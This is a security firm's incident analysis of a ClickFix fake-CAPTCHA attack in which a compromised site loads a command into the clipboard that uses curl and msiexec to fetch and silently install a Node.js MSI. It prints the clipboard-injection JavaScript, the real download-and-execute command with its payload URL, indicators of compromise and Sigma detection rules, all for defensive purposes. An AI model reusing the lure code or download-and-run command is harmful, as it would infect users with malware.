Fake CAPTCHA to Full Execution: Dissecting a ClickFix LOTL Attack

Prepared by: Philip O'Dwyer & Muhammad Uzair | Last update: 15 April 2026

A user-driven execution technique bypasses traditional controls using trusted Windows binaries

A companion article covers the business impact and security implications for organisational leaders: https://www.triskelelabs.com/blog/copy-paste-cyber-attack-clickfix-soc-detection

A recent incident investigated by Triskele Labs highlights a growing shift in adversary tradecraft, where user-driven execution replaces traditional exploitation techniques.

In this case, a ClickFix-style Fake CAPTCHA lure was used to socially engineer a user into executing a malicious command. Rather than deploying a conventional malware dropper, the attacker relied entirely on legitimate Windows binaries and trusted infrastructure, forming a living-off-the-land (LOTL) attack chain.
From initial interaction to payload execution, the entire sequence completed in under 10 seconds.

Fake CAPTCHA pages abuse clipboard to trigger execution

Browser history analysis confirmed the user was actively searching for defibrillators, during which they visited:

defibrillators[.]com[.]au

Upon visiting the site, the user was presented with a ClickFix-style Fake CAPTCHA prompt, initiating the attack chain.

This indicates the site was either:

• Compromised (likely) and serving malicious JavaScript 

• Or part of a malvertising / traffic redirection chain 

Following interaction with the CAPTCHA, the page executed clipboard injection logic:

navigator.clipboard.writeText(

  'cmd /c "curl -L https://<redacted>/payload.msi -o %TEMP%\\n.msi && msiexec /i %TEMP%\\n.msi /qn /norestart"'

);

After clicking the CAPTCHA, the user was shown instructions to:

• Press Win + R 

• Paste the clipboard contents (Ctrl + V) 

• Press Enter 

This removes interpretation from the user and ensures high-probability execution.

Initial Access Vector: User Intent Abuse

This incident demonstrates a shift toward intent-based initial access, where adversaries exploit legitimate user activity rather than relying on phishing or vulnerability exploitation.

In this case:

• The user performed a legitimate search (defibrillators) 

• A relevant website was visited 

• The site delivered a malicious interaction via Fake CAPTCHA 

This removes traditional indicators such as:

• Suspicious emails 

• Malicious attachments 

• Known exploit activity 

Instead, the attack leverages:

Trust in context and user intent as the delivery mechanism

Figure 1: ClickFix page impersonating a CAPTCHA prompt, using the clipboard API to pre-load a malicious command

Figure 2: Fake verification error prompting the user to execute a pre-loaded command via the Windows Run dialog

Figure 3: Clipboard Injection Materialised: Command Executed via Run

Malicious command leverages built-in Windows tools

Once executed, the command initiated a chained sequence of legitimate tools:

cmd /c "curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi -o %TEMP%\n.msi && msiexec /i %TEMP%\n.msi /qn /norestart"

Figure 4: Run Dialog Execution Artefact with Embedded Payload Delivery Command

Breakdown of the attack command

The use of Google Cloud Storage reduces suspicion and bypasses reputation-based controls.

Process chain confirms living-off-the-land execution

Endpoint telemetry revealed a clear parent-child execution chain:

explorer.exe
  └── cmd.exe
        └── curl.exe
              └── msiexec.exe

This sequence demonstrates classic LOLBAS abuse:

• curl.exe used for payload delivery (T1105)

• msiexec.exe used for execution (T1218.007) 

Figure 5: User Click to Code Execution: Visualising the Attack Chain

Registry artefacts confirm user-driven execution

Analysis identified the following registry artefact:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Containing:
cmd /c "curl -L https://storage.googleapis.com/.../Node_Min.msi ..."

This confirms execution via the Windows Run dialog, aligning with Fake CAPTCHA instructions.________________________________________

Attack completes in seconds, detection takes minutes

The execution chain completes in <10 seconds, requiring detection and response to operate in near real time.

Behavioural detection identifies malicious execution pattern

The activity was detected via:

MaliciousCopyPaste (MITRE T1204.004)

Detection triggered based on:

• Suspicious process chain 

• Command-line payload retrieval 

• Silent MSI execution 

• Execution originating from explorer.exe 

Detection was not based on:

• File hashes 

• Known malware signatures 

• Static indicators 

Node.js installer used as payload staging mechanism

The payload was delivered as:

Node_Min.msi

This technique is commonly used to:

• Deploy Node.js runtime environments
• Execute JavaScript-based payloads
• Stage follow-on malware

Observed in campaigns involving:

• Lumma Stealer
• AsyncRAT
• Node-based loaders

Trusted tools, malicious intent

Every component used in this attack is legitimate:

• explorer.exe
• cmd.exe
• curl.exe
• msiexec.exe

Individually benign, collectively malicious:

explorer.exe → cmd.exe → curl.exe → msiexec.exe

Malicious intent is defined by execution sequence, not tooling

Why traditional security controls struggle

This attack bypasses traditional controls because:

• No exploit is used

• No malicious binary is initially dropped

• Payload is hosted on trusted infrastructure

• Execution uses signed binaries 

Detection based on:

• Signatures

• Reputation

• Static analysis

is ineffective.

Indicators of Activity (IOAs) and Compromise (IOCs)

IOAs (Behavioural Indicators)

• explorer.exe → cmd.exe → curl.exe → msiexec.exe

• MSI execution from %TEMP%

• Silent install flags (/qn /norestart)

• Command-line driven payload retrieval

• RunMRU registry artefact
  
  

Indicators of Compromise (IOCs)

Malicious / Suspicious Domains

defibrillators[.]com[.]au
sasndfsdfghjasd[.]run

Malicious IP address

188[.]114[.]97[.]3

Payload Hosting

storage.googleapis.com (abused for payload delivery)

Filename

Node_Min.msi

Command Pattern

cmd /c curl -L <url> -o %TEMP%\*.msi && msiexec /i %TEMP%\*.msi /qn

Detection strategy and engineering

High-confidence detection patterns

• cmd → curl → msiexec chain

• MSI execution from %TEMP%

• Silent install flags

• External CLI-based downloads

Sigma detection concepts

title: Suspicious Curl to MSI Execution Chain
logsource:
category: process_creation
detection:
selection:
ParentImage: '*\\cmd.exe'
Image: '*\\curl.exe'
condition: selection

---

title: Silent MSI Execution from Temp
detection:
selection:
Image: '*\\msiexec.exe'
CommandLine|contains:
- '/qn'
- '%TEMP%'
condition: selection

MDR response prevents compromise

• MTTD: 5 minutes

• MTTR: 44 minutes

• Execution chain analysed

• Malicious intent confirmed

• Host actively contained

Containment: the control that mattered

Host isolation:

• Stopped further execution

• Blocked outbound communication

• Prevented persistence

• Eliminated lateral movement

Attack stopped mid-execution, pre-impact

Detection vs response

• Detection identifies activity

• MDR enforces control

• Payload execution completes

• Runtime deployed

• Secondary malware executes

A shift toward user-driven attack vectors

• Exploitation of user behaviour

• Use of legitimate tooling

• Execution-based attack chains

Detection must shift from:

“Is this file malicious?”

to:

“Does this behaviour make sense?”

Final thoughts

This attack reached execution despite existing controls, reflecting the effectiveness of user-driven, LOTL-based techniques. However, it did not progress to compromise.

• Preventative controls disrupted execution

• Behavioural detection identified the activity

• Response actions ensured containment

The attack was stopped before impact through a combination of layered controls and MDR-led response.